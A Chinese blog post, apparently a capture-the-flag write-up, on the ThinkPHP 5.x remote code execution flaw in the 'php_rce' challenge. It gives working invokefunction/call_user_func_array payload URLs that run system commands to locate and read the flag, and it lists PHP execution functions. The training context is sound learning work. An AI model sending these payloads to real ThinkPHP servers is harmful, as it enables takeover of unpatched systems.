专栏首页奝-大周攻防世界-php_rce

攻防世界-php_rce

第一次见thinkPHP,以前只有听过

刚看到还以为我容器坏了…其实并没有

题目是phprce,我们先来介绍一下rce(远程代码执行漏洞),百度结果如下:

1. 什么是远程代码执行漏洞
远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。

2. 漏洞产生的根本原因
服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。

页面也说明了是ThinkPHP V5版本 百度得知这个版本的确有远程代码执行漏洞

ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞。攻击者通过该漏洞可能完全控制Web服务器。

直接上payload

查找flag

http://111.198.29.45:43736/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

cat

http://111.198.29.45:43736/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

附上一些查找到的函数

PHP代码执行函数:eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()

  PHP命令执行函数:system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • BJDCTF2nd-EasyMd5

    在HTTP头里发现Hint: select * from ‘admin’ where password=md5($pass,true)

  • ACTF2020新生赛-Include

    访问?file=php://filter/read/convert.base64-encode/resource=flag.php

  • php学习day1

    数据类型:data type,在PHP中指的是存储的数据本身的类型,而不是变量的类型。PHP是一种弱类型语言,变量本身没有数据类型。

  • 【Go 语言每日package解析】 package list

    Go 语言 开发包大全: http://www.goserver.club/discuz/ ... =12&from=portal 注:在开发包大全中找 li...

    李海彬
  • GO-&获取地址与*解引用

    小小咸鱼YwY
  • 京东版“Dash Button”问世,支持一键购买快消品

    镁客网
  • golang技术点整理

    defer的执行次序(先进后出)和执行的点(return之前, 返回值赋值之后)。

    王磊-AI基础
  • Mysql学习笔记【锁】

    在 InnoDB 事务中,行锁是在需要的时候才加上的,但并不是不需要了就立刻释放,而是要等到事务结束时才释放。

    秦穆之
  • 掌握一门语言Go

    摘要:Go语言的优势不必多说,通过本篇文章,让我们花时间来掌握一门外语,Let's Go! 关键字:Go语言,闭包,基本语法,函数与方法,指针,slic...

    文彬
  • ESP8266 SDK开发: 开发环境搭建(NONOS 2.2.0)

    eagle.flash.bin                             0x00000

    杨奉武

扫码关注云+社区

领取腾讯云代金券